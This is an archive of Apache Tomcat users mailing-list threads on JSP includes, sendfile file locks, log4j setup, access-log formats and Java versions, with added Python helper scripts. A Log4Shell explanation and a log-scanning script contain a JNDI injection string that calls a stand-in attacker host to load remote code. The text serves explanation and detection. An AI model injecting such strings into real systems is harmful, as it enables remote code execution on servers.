Re: [EXTERNAL EMAIL] Re: JSP include not working

2023-12-05 Thread Niranjan Rao
I'm one step further. Cloned the tomcat repo, switched to the appropriate 
tag/branch and looked at the code. Comments indicated the need to have a 
full path, and my paths did not start with "/". Added the "/" on a couple 
of pages and no more include error.

As of now, even though I don't get the include error, the contents of the 
include file are not getting included. Trying to figure out why. At 
least now the status code has changed from 500 to 200. Not working yet but 
progress nevertheless.



Regards,


Niranjan

On 12/5/23 11:09, Rob Sargent wrote:
On 12/5/23 12:01, Niranjan Rao wrote:
> Greetings,
>
> I'm missing something obvious and hoping that someone can point my 
> nose in right direction.

>
>
> We have a application WAR file that works fine on tomcat 7.0.78. We're 
> trying to migrate this application to 9.0.82. When trying to hit the 
> pages, I'm getting error JSP file not found at WEB-INF/<location>. The app works fine in tomcat version 7. We have other 
> applications which use similar pattern and are working fine on tomcat 9.

>
>
> I've checked and checked and confirmed file exists at desired 
> location. Only significant difference between migrated apps and this 
> app I noticed was web.xml points version 4.0 where it works and 3.0 
> where it does not. Changing version to 4.0 in broken app did not help.

>
>
> The applications use Spring and serve JSP through spring controllers. 
> Problematic application seems to be initializing properly based on 
> application logs, just that it's not able to include JSP. Any log 
> files do not show any exception trace, but access log file logs the 
> error with 500 status code.

>

Case sensitive file names, perhaps.

>
> Am I missing something obvious?
>
> Regards,
>
> Niranjan
>


-----
To unsubscribe, e-mail:users-unsubscr...@tomcat.apache.org
For additional commands, e-mail:users-h...@tomcat.apache.org


-- 
Niranjan Rao | Sr. Architect (he/his)
Paymentus Corporation | The Real-Time Bill Payment Company (TM)
860 Hillview Court Suite 220 Milpitas CA 95035
www.paymentus.com

Re: [EXTERNAL EMAIL] Re: JSP include not working

2023-12-05 Thread Niranjan Rao
Thank you Rob, but doubtful. We're a Ubuntu shop and always mindful of 
case sensitivity.



On 12/5/23 11:09, Rob Sargent wrote:
On 12/5/23 12:01, Niranjan Rao wrote:
> Greetings,
>
> I'm missing something obvious and hoping that someone can point my 
> nose in right direction.

>
>
> We have a application WAR file that works fine on tomcat 7.0.78. We're 
> trying to migrate this application to 9.0.82. When trying to hit the 
> pages, I'm getting error JSP file not found at WEB-INF/<location>. The app works fine in tomcat version 7. We have other 
> applications which use similar pattern and are working fine on tomcat 9.

>
>
> I've checked and checked and confirmed file exists at desired 
> location. Only significant difference between migrated apps and this 
> app I noticed was web.xml points version 4.0 where it works and 3.0 
> where it does not. Changing version to 4.0 in broken app did not help.

>
>
> The applications use Spring and serve JSP through spring controllers. 
> Problematic application seems to be initializing properly based on 
> application logs, just that it's not able to include JSP. Any log 
> files do not show any exception trace, but access log file logs the 
> error with 500 status code.

>

Case sensitive file names, perhaps.

>
> Am I missing something obvious?
>
> Regards,
>
> Niranjan
>





JSP include not working

2023-12-05 Thread Niranjan Rao

Greetings,

I'm missing something obvious and hoping that someone can point my nose 
in right direction.



We have a application WAR file that works fine on tomcat 7.0.78. We're 
trying to migrate this application to 9.0.82. When trying to hit the 
pages, I'm getting error JSP file not found at WEB-INF/. 
The app works fine in tomcat version 7. We have other applications which 
use similar pattern and are working fine on tomcat 9.



I've checked and checked and confirmed file exists at desired location. 
Only significant difference between migrated apps and this app I noticed 
was web.xml points version 4.0 where it works and 3.0 where it does not. 
Changing version to 4.0 in broken app did not help.



The applications use Spring and serve JSP through spring controllers. 
Problematic application seems to be initializing properly based on 
application logs, just that it's not able to include JSP. Any log files 
do not show any exception trace, but access log file logs the error with 
500 status code.



Am I missing something obvious?

Regards,

Niranjan

--
*Niranjan Rao | Sr.Architect
*/he/his/
*Paymentus
**Paymentus Corporation***/The Real-Time Bill Payment Company^TM //^
/
860 Hillview Court Suite 220 Milpitas CA 95035
www.paymentus.com <http://www.paymentus.com/>

Re: [EXTERNAL EMAIL] Please help me install Tomcat

2023-01-19 Thread Niranjan Rao
71]: pam_unix(sudo:session): session closed for user root
Jan 19 19:40:27 arbolone sudo[5672]:   jamiil : TTY=pts/0 ; PWD=/home/jamiil/Downloads ; USER=root ; COMMAND=/usr/bi>
Jan 19 19:40:27 arbolone sudo[5672]: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=1000)
Jan 19 19:40:27 arbolone sudo[5672]: pam_unix(sudo:session): session closed for user root
Jan 19 19:40:41 arbolone sudo[5691]:   jamiil : TTY=pts/0 ; PWD=/home/jamiil/Downloads ; USER=root ; COMMAND=/usr/bi>
Jan 19 19:40:41 arbolone sudo[5691]: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=1000)
Jan 19 19:40:41 arbolone sudo[5691]: pam_unix(sudo:session): session closed for user root
Jan 19 19:40:57 arbolone sudo[5713]:   jamiil : TTY=pts/0 ; PWD=/home/jamiil/Downloads ; USER=root ; COMMAND=/usr/bi>
Jan 19 19:40:57 arbolone sudo[5713]: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=1000)
Jan 19 19:40:57 arbolone sudo[5713]: pam_unix(sudo:session): session closed for user root
Jan 19 19:42:28 arbolone gnome-shell[1443]: libinput error: event10 - Logitech Wireless Mouse: client bug: event pro>
Jan 19 19:42:28 arbolone gnome-shell[1443]: libinput error: event10 - Logitech Wireless Mouse: WARNING: log rate lim>
lines 2916-2938/2938 (END)


I really don't even know what to do with that info. I am an enthusiast
programmer and not a trained computer programmer, thus I find this kind
of thing really challenging.

Can anyone help?


Thanks



Re: [EXTERNAL EMAIL] FW: Errors in Tomcat logs / application processing

2022-11-08 Thread Niranjan Rao
Please remember to remove any passwords or sensitive data when you post 
on public email lists


On 11/8/22 00:58, Ganesan, Prabu wrote:


Hi Team.

Could you please help with the below errors.

We have enabled TLS successfully, but after TLS was enabled we are facing 
the below issues.


Please help us on priorities.

Thanks & Regards,

Prabu Ganesan

Consultant | MS-Nordics

Capgemini India Pvt. Ltd. | Bangalore

Contact: +91 8526554535

Email: prabhu.c.gane...@capgemini.com

www.capgemini.com 




From: Morell, Alice
Sent: 07 November 2022 21:33
To: DL IN IKANO Middleware
Cc: Thombre, Dipali Rajesh; Nayak, Shruthi; Khandekar, Preeti; Deshmukh, Hemant; Phase, Samir
Subject: Errors in Tomcat logs / application processing

Hello!

The error we are facing is:

“SOAP Problems executing transaction LoginApplication via Web Service, 
underlying problem is Error unmarshalling message”


I want to know if we can solve this by changing the values in the 
context.xml tags: the hardcoded URLs.


As agreed, here are

  * Info on error logs,
  * Screen shots of the errors that the end user is seeing,
  * Sequential steps for TLS on the instances

And

  * Example on the changes made in the files

You can find the error logs generated for these 2 URLs at this location:

/export/home/aloradm/tls/tls2/Test1FrontEnd/

Where the directory called “1” is for what is described under issue 1 
and “2” under issue 2.


 1. To replicate current error:

Use a browser with a cleared cache!

Browse to:

tvmdc2linweb001.baf.ikano:7400/PCUKTST1ENV/ikanoRetail/

Press ”Contact Centre” too get this first error:

Press “Click here to log in again” and then the red button that says 
“Contact centre”.


The page is just getting reloaded to same screen again. For each time 
you press the red button, a url pattern of “/contactcentre” is added 
to the path:


In the backend, the logs for my tries is attached in the folder 
ikanoRetailLogin



To replicate current error you need login credentials, so you can only 
view my screen shot for this one:


Use a browser with a cleared cache!

Browse to:


Re: [EXTERNAL EMAIL] About granting permissions to Tomcat JVM

2022-10-20 Thread Niranjan Rao
Are you using FileInputStream or FileOutputStream on the file and closing 
the stream before deletion? If so, change to Files.newInputStream or 
Files.newOutputStream.


One of our applications (not a web application) was running out of file 
handles even though we were closing the file handles. Everything was in a 
try block and we did verify the handles were closed as far as our code was 
concerned. It turned out that the JVM does not close the actual handles 
until late in the game. There is a bug on the openjdk bug tracker that 
discusses this. After using Files, our issue was resolved.


If you are closing the file and the JVM is not releasing the handles, this 
sounds very similar to the issue we faced.



Regards,


Niranjan


On 10/8/22 09:36, Martin Moore wrote:
Hello,

I am facing a problem using Tomcat V8 with my J2ee app that deletes (using
file.delete() Java 8) a file from disk (Windows). The file is actually
deleting only on application level meaning that the application does not
see the file anymore but if I open the folder I still see the file which is
then locked by the Java process. I only get the file to be removed physically
when I close the Tomcat instance.

Does this problem relate to permissions in catalina.policy ?
How to solve this?

Re: Latest version url

2022-09-03 Thread Niranjan Rao
Came up with a one liner in case if someone else needs it. If you think 
it can be improvised, please feel free to improvise. Rest of it can fit 
in the shell script nicely.


curl https://tomcat.apache.org/doap_Tomcat.rdf | grep -A2 "Latest Stable 9.0.x Release" | grep "" | sed "s###g"


Regards,

Niranjan

On 9/3/22 11:15, Mark Thomas wrote:

Hi,

The short answer is no. You are going to have to parse something and 
then construct the URL from the result.


I can think of a couple of options.

1. https://tomcat.apache.org/doap_Tomcat.rdf
2. The download page
3. https://dlcdn.apache.org/tomcat/tomcat-10/

You might also be able to do something with a dummy Maven project and 
a dependency on org.apache.tomcat:tomcat and an appropriate version 
range.


Mark


On 03/09/2022 00:27, NH Rao wrote:

Greetings,

I am looking for a permalink or similar which won't go away and 
points to the latest version of tomcat for the currently supported major versions.
The official downloads page points to the latest minor release of the major 
version, e.g. https://tomcat.apache.org/download-90.cgi, and download links keep
changing.

Is there any way to get the latest version link, or the latest version and 
then us forming the url from the tomcat website. We have scripts that download 
whatever latest version is available and run some tests, and the link keeps breaking.

Regards,

Niranjan







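As an added example (not Niranjan's one-liner and not Tomcat project code), here is the same extraction done with an XML parser instead of grep/sed, so the angle-bracket tag names the archive stripped from the one-liner are not needed. It runs against a constructed DOAP snippet laid out like doap_Tomcat.rdf (release/Version/name/created/revision); the version numbers in it are made up, and the download-URL layout under dlcdn.apache.org is an assumption taken from the tomcat-10 link Mark mentions.

```python
"""Added example: pick the latest release of a Tomcat major line out of
the project's DOAP RDF, validate it, and build the download URL from it.
Not the mailing-list one-liner and not Tomcat project code."""
import re
import xml.etree.ElementTree as ET

DOAP_NS = "http://usefulinc.com/ns/doap#"

# Constructed sample in the layout of https://tomcat.apache.org/doap_Tomcat.rdf
# (release/Version/name/created/revision). The versions are made up.
SAMPLE_RDF = """<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns="http://usefulinc.com/ns/doap#">
  <Project>
    <name>Apache Tomcat</name>
    <release><Version>
      <name>Latest Stable 10.1.x Release</name>
      <created>2022-08-20</created>
      <revision>10.1.0</revision>
    </Version></release>
    <release><Version>
      <name>Latest Stable 9.0.x Release</name>
      <created>2022-08-20</created>
      <revision>9.0.65</revision>
    </Version></release>
  </Project>
</rdf:RDF>
"""

# A revision fetched over the network gets spliced into a URL and later a
# file name, so it must look like a version number and nothing else
# (no slashes, no "..", no shell metacharacters).
VERSION_RE = re.compile(r"^\d+\.\d+\.\d+$")


def validate_revision(revision):
    return bool(VERSION_RE.match(revision))


def latest_release(rdf_text, major_line):
    """Return the revision of 'Latest Stable <major_line>.x Release',
    or None if the document has no such entry."""
    root = ET.fromstring(rdf_text)
    wanted = f"Latest Stable {major_line}.x Release"
    for version in root.iter(f"{{{DOAP_NS}}}Version"):
        if version.findtext(f"{{{DOAP_NS}}}name") != wanted:
            continue
        revision = (version.findtext(f"{{{DOAP_NS}}}revision") or "").strip()
        if not validate_revision(revision):
            raise ValueError(f"unexpected revision text: {revision!r}")
        return revision
    return None


def download_urls(revision):
    """Archive URL and its .sha512 URL. The path layout under
    dlcdn.apache.org is an assumption based on the tomcat-10 link in the thread."""
    major = revision.split(".")[0]
    archive = (f"https://dlcdn.apache.org/tomcat/tomcat-{major}/v{revision}"
               f"/bin/apache-tomcat-{revision}.tar.gz")
    return archive, archive + ".sha512"


if __name__ == "__main__":
    rev = latest_release(SAMPLE_RDF, "9.0")
    print(rev, *download_urls(rev))
```

In a download script the RDF would be fetched with curl or urllib in place of SAMPLE_RDF; the checksum URL is returned alongside the archive URL so the script can verify the .sha512 (or the .asc signature) before the archive is unpacked onto a server.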



Re: AW: AW: AW: AW: Filehandle left open when using sendfile

2022-06-21 Thread Niranjan Rao

On 6/20/22 23:59, Thomas Hoffmann (Speed4Trade GmbH) wrote:

Hello Mark,


-----Original Message-----
From: Mark Thomas 
Sent: Monday, 20 June 2022 22:13
To: users@tomcat.apache.org
Subject: Re: AW: AW: AW: Filehandle left open when using sendfile

On 20/06/2022 11:39, Thomas Hoffmann (Speed4Trade GmbH) wrote:

Hello Mark,

thanks for your reply!


-----Original Message-----
From: Mark Thomas 
Sent: Monday, 20 June 2022 12:06
To: users@tomcat.apache.org
Subject: Re: AW: AW: Filehandle left open when using sendfile

On 16/06/2022 19:58, Thomas Hoffmann (Speed4Trade GmbH) wrote:




In the meantime I stumbled upon this bug report:
https://bugs.java.com/bugdatabase/view_bug.do?bug_id=4715154
So maybe the problem lies even deeper.
Similar description here:
https://cemerick.com/blog/2006/08/30/memory-mapping-files-in-java-causes-problems.html

Some ppl suggest to use java.lang.ref.Cleaner or don’t use Memory-Mapped files under Windows.

I don’t know if there are other solutions.

Your research looks to be exhaustive. I can't find any better ideas.

Using the java.lang.ref.Cleaner looks to be a viable option. We know
when the mapped file is no longer being used. However, that requires
Java 12 onwards.

This is only going to be required if the file locking is an issue. In
read-only scenarios or when using an OS other than Windows it won't be

an issue.

So, what do we want to do?

1. Disable sendfile for HTTP/2 if running on Windows?

2. Document the potential issues with sendfile + HTTP/2 + Windows if
resources are not read-only?

3. Use the JreCompat mechanism to clear the references if possible:
  - if running on Windows
  - on all OSes
  - if enabled via configuration

Something else?

Mark


I did some further searching on this topic.
Several posts disregard using java.lang.ref.Cleaner because if the buffer is
used afterwards, it will crash the VM. But if used carefully it works.

If we use this option, it should be possible to use it appropriately carefully.


About your suggestions:
2) Documenting would be helpful, if lock can't be prevented.
   I also found documentation at e.g.
https://docs.oracle.com/javase/9/docs/api/java/nio/channels/FileChannel.html#map-java.nio.channels.FileChannel.MapMode-long-long-
   "The buffer and the mapping that it represents will remain valid until
the buffer itself is garbage-collected."

Which is essentially the problem. Using the Cleaner would clean up the
reference sooner.


3) As JreCompat is a bit risky, enabling via config sounds safe to me.

JreCompat is perfectly safe. The jdk.internal.misc.Unsafe API is where the
risk is and this is primarily the risk of the crash mentioned above that we
should be able to avoid.


Some other (theoretical?) options:
4) In an older version of Tomcat native lib there seemed to be a native
Implementation of MMap:
https://tomcat.apache.org/tomcat-10.0-doc/api/org/apache/tomcat/jni/Mmap.html

I read that this was an alternative to the Java memory mapped
file.  But it was removed in newer versions. Maybe it can be
resurrected for this case and used if native lib is available(?)

Sorry, no. We are moving away from the native library. Eventually we will just
use project Panama to wrap OpenSSL. Until then, we are removing
everything that isn't required to support the use of OPenSSl with NIO and
NIO2.

The primary reason for this is stability.


5) Instead of FileChannel.map maybe a normal ByteBuffer with
FileChannel.read(buffer) can be used (?)

That is worth considering. The other sendfile implementations don't use a
memory mapped file.

I'll start a discussion on the dev list.


One remaining question:
I didn’t find FileChannel.map in the other connectors. Is
Http2AsyncUpgradeHandler the only occurrence?

In the main code base, yes. There is another usage in the test code but that is
less of a concern.

Mark


Just two thoughts / remarks:
3) New java versions provide java.lang.ref.Cleaner. In older java versions a 
similar class was sun.misc.Cleaner (though the usage looks a bit strange)

5) The memory mapped file approach is quite memory efficient as the file gets 
virtually mapped into the address space of the java process without loading 
all the data into (real) memory. As far as I understood, only the used parts 
of the file gets loaded by Windows OS.
When reading the file into a Buffer, the file is read completely. This 
shouldn’t make a big difference with files around some KB or MB.
However, for large files with several GB they might be handled well via 
memory mapped files but not with a ByteBuffer.
I am not sure, if sendfile is popular and used for this use-cases. So maybe 
a configuration toggle between "memory-optimized" and "lock-optimized" might be 
Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

2021-12-14 Thread Niranjan Rao
This is one of the best explanations I've seen. And it does not use the 
word Minecraft to emphasize the importance.


Thank you.

Niranjan
On 12/13/21 3:36 PM, Christopher Schultz wrote:

James,

On 12/13/21 14:48, James H. H. Lampert wrote:

On 12/13/21 10:53 AM, Mark Thomas wrote:

Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any 
more format strings. This means the output of one format string can 
insert a new format string.

. . .

Thanks. It's starting to make sense to me now, even given that much 
of it involves Java functionality I'd never heard of.


After re-reading the Veracode article in light of what you said, I 
then found a couple of Wikipedia articles that further clarify 
things, for me at least:


https://en.wikipedia.org/wiki/Log4j
https://en.wikipedia.org/wiki/Log4Shell

So it's the ability to resolve stuff of the general format 
"${prefix:name}" within a log string, that's the problem.


It's starting to reach a point where I can wrap my 59-year-old little 
grey cells around it.


As much fun as it is to talk about this stuff, "we" (ASF volunteers, 
as well as many others) tend to try not to provide examples of how to 
exploit vulnerabilities. In this case, all you have to do is search 
GitHub for this CVE or "log4shell" on GitHub and you can see lots of 
examples.


In this case, the cat is out of the bag. I'm still not going to 
provide specific examples, but I can help you understand, conceptually.


The link Mark provided in a separate response has some of the dirty 
details. Without talking at that level of detail, the worst attack 
works essentially like this:


1. Attacker hosts an RMI server, which is a thing that allows Java 
(client) applications to remotely-load .class files from other places. 
This is great in an "enterprise" environment because a service can 
tell a client "here is the thing you need to work with me" instead of 
saying "well, if you don't have foo-bar-1.4.5.jar loaded then you can 
piss off." It's handy... and seriously dangerous if you aren't careful.


Any evildoer can do this whenever they want, there is nothing stopping 
them, nor is it really that damaging to the world in general. Just 
like I can brew poison in my own bathtub, if nobody is drinking from 
my bathtub (ew?), it's not likely to cause too much sickness or death.


2. A vulnerability is discovered and reported in log4j. This allows 
log *messages* to contain JNDI lookups. This includes 
attacker-controlled things like e.g.:


  log.info("FYI User " + username + " just searched for search string 
" + queryString);


Pretty innocuous, right? Well, if the search string looks like 
${jndi:[stuff]} then ... boom.


3. JNDI lookups allow you to request that information be pulled-in 
from an LDAP server. JNDI across the network is essentially the same 
thing as LDAP (or "Active Directory" if that's what you use... AD is 
LDAP). One of the things you can tell your JNDI lookup to do is load a 
.class file over the network and use it for $stuff.


4. Remember that evil RMI server we set up in #1 above? Well, unless 
you are filtering-out LDAP connections to random IPs (and, really, you 
*should be*), then I as an attacking user can just go to your 
application and search for


  "Hey buddy lol ${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject};

At this point, log4j will consider this string to log:

FYI User chris just searched for the search string Hey buddy lol 
${jndi:/lookup?name=ldap://my.evil.ip:port/EvilObject}


Oh, look, there's a magic "${jndi:" thing in there. Let's helpfully 
resolve that...


The JNDI lookup causes your server to reach-out to my.evil.ip, pull a 
reference for that class across the wire, then pull the class 
definition across the wire, and run the evil class code on your server.


At this point, the resulting string written to the log does make a bit 
of difference. The evil code has been loaded onto your server and you 
have a Bad Day.


Now, this can be mitigated in a number of ways, which is nice. My two 
favorite (and incomplete) ways to mitigate this are:


1. Don't allow outgoing LDAP connections from your server. In fact, it 
doesn't matter if they are LDAP or not. Don't allow outgoing 
connections from your servers except the required[1] ones.


2. Recent Java versions automatically disable remote-classloading via 
LDAP to prevent this kind of monkey business. But there are ways to 
make it work anyway.


This is why we can't have nice things.

RCE is bad m'kay, but let's say that you don't allow outgoing network 
connections AT ALL from your server, so you are TOTALLY IMMUNE from 
this kind of attack. Well, RCE ain't the only thing possible.


Data exfiltration is an often-overlooked attack that can still be 
pretty bad. It's "limited" to what can be found in/through JNDI but 
... it's possible to find quite a bit of interesting information that 
way. How? Those log 
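An added detection example, written here for this page and not code from Christopher, Mark or the ASF: it scans access-log lines for the `${prefix:name}` lookup syntax described above, URL-decodes the request line first because the access log stores it percent-encoded, keeps nested lookups together (the repeated re-evaluation Mark describes is what makes nesting meaningful), and rates the `jndi` prefix higher than any other. The three log lines are constructed; the lookup string in them is the `my.evil.ip:port/EvilObject` placeholder from the message above, once inside a query string and once in a User-Agent header.

```python
"""Added example (not ASF code): find log4j-style ${prefix:name} lookups in
access-log lines, for detection and triage rather than exploitation."""
from urllib.parse import unquote

# Constructed access-log lines in the common Tomcat layout. Line 1 is
# benign; lines 2 and 3 carry the placeholder lookup from the message above,
# percent-encoded in a query string and plain in the User-Agent field.
SAMPLE_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:00:00 +0000] "GET /search?q=log4j+update HTTP/1.1" '
    '200 532 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [13/Dec/2021:10:00:07 +0000] "GET /search?q=Hey+buddy+lol+'
    '%24%7Bjndi%3Aldap%3A%2F%2Fmy.evil.ip%3Aport%2FEvilObject%7D HTTP/1.1" '
    '200 532 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Dec/2021:10:00:09 +0000] "GET / HTTP/1.1" 200 1021 "-" '
    '"${jndi:ldap://my.evil.ip:port/EvilObject}"',
]


def extract_lookups(text):
    """Return every top-level ${...} span in text. Braces are counted so a
    lookup that contains another lookup comes back as one span; a lookup
    with no closing brace is still returned, since it is still worth a look."""
    lookups, depth, start, i = [], 0, None, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                lookups.append(text[start:i + 1])
        i += 1
    if depth > 0:
        lookups.append(text[start:])
    return lookups


def lookup_prefix(lookup):
    """The 'prefix' in ${prefix:name}, lower-cased; '' if there is no colon."""
    prefix, sep, _ = lookup[2:].partition(":")
    return prefix.lower() if sep else ""


def scan_access_log(lines):
    """One finding per lookup: line number, the lookup, its prefix, whether it
    nests another lookup, and a severity (jndi is the prefix the advisory is
    about; anything else is flagged for review)."""
    findings = []
    for number, line in enumerate(lines, 1):
        # The request line is logged percent-encoded; decode before matching.
        for lookup in extract_lookups(unquote(line)):
            prefix = lookup_prefix(lookup)
            findings.append({
                "line": number,
                "lookup": lookup,
                "prefix": prefix,
                "nested": "${" in lookup[2:],
                "severity": "high" if prefix == "jndi" else "review",
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LINES):
        print(finding)
```

Matching the decoded line rather than the raw one is the detail that matters for access logs; application logs that already contain the decoded value can be scanned as they are.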

Access log format in the access log files

2021-11-09 Thread Niranjan Rao

Greetings,

We are on tomcat 9.* version.

Is there any way to log the format string used by access log valve in 
the access logs? I'd be happy to see the format string like '%h %I %u %t 
"%r" %s %b "%{Referer}i" "%{User-Agent}i"' in the log files either at 
top of the file when file rolls to next day or in the middle of the file 
if tomcat is restarted for whatever reason.



We discovered that some servers were configured in a different way and 
our log analysis tool were barking at wrong field from the log. If tool 
can see the format in the file, it will be easier to read next lines 
based on the format and find exact fields that we are interested in.



Regards,


Niranjan


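An added example (not Tomcat code and not Niranjan's tool) of what a log-analysis tool can do once it knows the format string: it builds a regex from the AccessLogValve pattern that produced the lines, names each field after its pattern code, switches patterns when it meets a `#Format:` header line, and reports lines that do not match instead of silently reading the wrong field. Tomcat does not write such a header line; it is a constructed convention standing in for the request above. The log lines and both patterns are constructed for the example.

```python
"""Added example (not Tomcat code): parse Tomcat access-log lines using the
AccessLogValve pattern that produced them, switching patterns on a
'#Format:' header line (a constructed convention, not a Tomcat feature)."""
import re

# Pattern code -> (field name, regex). Codes follow the AccessLogValve
# documentation; only the common ones are covered.
FIELD_PATTERNS = {
    "h": ("remote_host", r"\S+"),
    "a": ("remote_ip", r"\S+"),
    "l": ("remote_logical_user", r"\S+"),
    "u": ("remote_user", r"\S+"),
    "t": ("timestamp", r"\[[^\]]+\]"),
    "r": ("request_line", r"\S+"),
    "m": ("method", r"\S+"),
    "U": ("request_uri", r"\S+"),
    "q": ("query_string", r"\S*"),
    "s": ("status", r"\d{3}"),
    "b": ("bytes_sent", r"-|\d+"),
    "D": ("duration_ms", r"\d+"),
    "T": ("duration_s", r"[\d.]+"),
    "I": ("thread_name", r"\S+"),
}
HEADER_KINDS = {"i": "header", "o": "outheader", "c": "cookie"}
TOKEN_RE = re.compile(r"%(?:\{([^}]*)\}([ioc])|([A-Za-z]))")

# Constructed log: two servers configured with different patterns.
SAMPLE_LOG = """\
#Format: %h %l %u %t "%r" %s %b "%{Referer}i" "%{User-Agent}i"
10.0.0.5 - - [09/Nov/2021:10:15:32 +0000] "GET /app/login HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.7 - alice [09/Nov/2021:10:15:40 +0000] "POST /app/api/search HTTP/1.1" 500 - "https://app.example/" "curl/7.79"
#Format: %h %l %u %t "%r" %s %D
10.0.0.9 - - [09/Nov/2021:10:16:01 +0000] "GET /app/health HTTP/1.1" 200 12
""".splitlines()


def format_to_regex(fmt):
    """Turn an AccessLogValve pattern into an anchored regex with one named
    group per field. A field the pattern wraps in double quotes may contain
    spaces, so it is matched up to the next quote instead of up to a space."""
    parts, pos = [], 0
    for m in TOKEN_RE.finditer(fmt):
        literal = fmt[pos:m.start()]
        parts.append(re.escape(literal))
        quoted = literal.endswith('"')
        if m.group(2):  # %{Name}i, %{Name}o or %{Name}c
            safe = re.sub(r"[^A-Za-z0-9]", "_", m.group(1)).lower()
            name, body = f"{HEADER_KINDS[m.group(2)]}_{safe}", r"\S+"
        else:
            code = m.group(3)
            if code not in FIELD_PATTERNS:
                raise ValueError(f"unsupported pattern code %{code}")
            name, body = FIELD_PATTERNS[code]
        if quoted:
            body = r'[^"]*'
        parts.append(f"(?P<{name}>{body})")
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile("^" + "".join(parts) + "$")


def parse_log(lines, default_format=None):
    """Return (records, unparsed). A '#Format:' line replaces the active
    pattern; a line that does not match the active pattern is reported in
    unparsed rather than being shoehorned into the wrong fields."""
    regex = format_to_regex(default_format) if default_format else None
    records, unparsed = [], []
    for line in lines:
        if line.startswith("#Format:"):
            regex = format_to_regex(line[len("#Format:"):].strip())
            continue
        match = regex.match(line) if regex else None
        if match is None:
            unparsed.append(line)
        else:
            records.append(match.groupdict())
    return records, unparsed


if __name__ == "__main__":
    records, unparsed = parse_log(SAMPLE_LOG)
    for record in records:
        print(record["remote_host"], record["status"])
    print("unparsed:", len(unparsed))
```

Run with the header lines stripped and a single fixed pattern, the third line ends up in `unparsed`, which is the loud failure the thread is asking for in place of a tool quietly reading a duration as a byte count.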



Re: Using log4j for logging

2021-06-29 Thread Niranjan Rao

We are actually using log4j2, I should have been clearer.

Does this mean we don't have to use specialized juli jar and adapters 
and many of the stackoverflow answers are out of date? I have seen 
answers saying download juli adapter version from tomcat version 7 and 
use it for 9 or similar.


Regards,

Niranjan

On 6/29/21 12:24 AM, Mark Thomas wrote:

On 29/06/2021 01:11, Niranjan Rao wrote:

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last 
present on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). 
Latter versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the 
best way to configure tomcat logs using log4j.


log4j was declared end of life in 2015. If you really need to use 
log4j then there are some pointers here:


https://stackoverflow.com/questions/869945/how-to-send-java-util-logging-to-log4j 



I'd recommend the answer from Emmanuel Bourg.

If you are using log4j2 then you can use:
https://logging.apache.org/log4j/2.x/log4j-jpl/index.html

Mark








Using log4j for logging

2021-06-28 Thread Niranjan Rao

Greetings,

I wanted to setup log4j for tomcat logs and google searches seems to 
indicate that this is possible. Many articles speak about downloading 
tomcat-juli-adapters.jar from bin/extras directory.


I found out that for tomcat version 9, extras directory is last present 
on version 9.0.14 
(https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/). Latter 
versions do not have extras directory.


Is tomcat-juli-adapters file no longer required? What will be the best 
way to configure tomcat logs using log4j.



My main interest is uploading access logs and catalina.out to AWS/S3 
bucket. For our application logs, we are already doing this. If there is 
a better way to achieve this, open to that solution too.



Regards,

Niranjan





Re: What sets Java version at installation?

2021-06-11 Thread Niranjan Rao
Try out following command. Entry with * is the java version your system 
is set to use. You can use same command to config alternate version.


update-alternatives --config java

We routinely use multiple versions of JDK on many systems. We just set 
JAVA_HOME and derive all paths from that. Works perfectly.


Regards,

Niranjan

On 6/11/21 2:00 PM, Mark Thomas wrote:

On 11/06/2021 21:53, Joel Griffith wrote:

Hi everyone,

I have two Ubuntu 20.04 servers, both with Tomcat 9 and Java 8 installed
from the standard repositories.

On the first, I installed Java 8 before installing Tomcat 9. When I
installed Tomcat 9, it evidently found the existing Java 8 installation,
and when I run the server it reports that it's using Java 8
(`/usr/lib/jvm/java-8-openjdk-amd64/bin/java`).

On the second, I installed Tomcat 9 before installing Java. Thus, Tomcat
found no existing Java on the system, and it installed the additional
packages 'openjdk-11-jre-headless', 'default-jre-headless', and
'java-common' as dependencies that it did not install on the first 
system.

When I run Tomcat on this one, it reports that it's using Java 11
(`/usr/lib/jvm/default-java/bin/java`, which symlinks to
`/usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java`), even though I've 
since installed Java 8 on that server, too.

Both systems use Java 8 as their default at the OS level (outside of
Tomcat):

$ java -version
openjdk version "1.8.0_292"

so I think it's a Tomcat-specific discrepancy.

I assume that there's a file Tomcat uses to record which version of 
Java it established at installation and which continues to affect how it 
runs now.

Is that right, and if so, where is this file?


Nope. Nothing to do with Tomcat. You'll need to ask Ubuntu support 
what is going on.


Mark









Re: Defining environment variables for a webapp ?

2021-04-26 Thread Niranjan Rao

On 4/14/21 5:29 AM, Rony G. Flatscher (Apache) wrote:

A JVM AFAIK would not honor changes to the environment after it got started


A serious question. Apologies for selective selection from the response.

Are there any operating systems where change in environment is 
automatically reflected in child process? My understanding was, 
processes always inherit parent environment and have no way of knowing 
what changed.



If you managed to spawn a process with a different parent based on your 
operating system, then you might see new values, but most of the 
spawn/exec calls (regardless of language of implementation) inherit the 
exact same environment variables. Some calls do allow you to set up the 
environment variables for the child process, but I am struggling to figure out 
where the grandparent process informed the parent about an environment change which 
can be sent to the grandchild.



Regards,


Niranjan





Re: Out of memory exception

2021-02-18 Thread Niranjan Rao

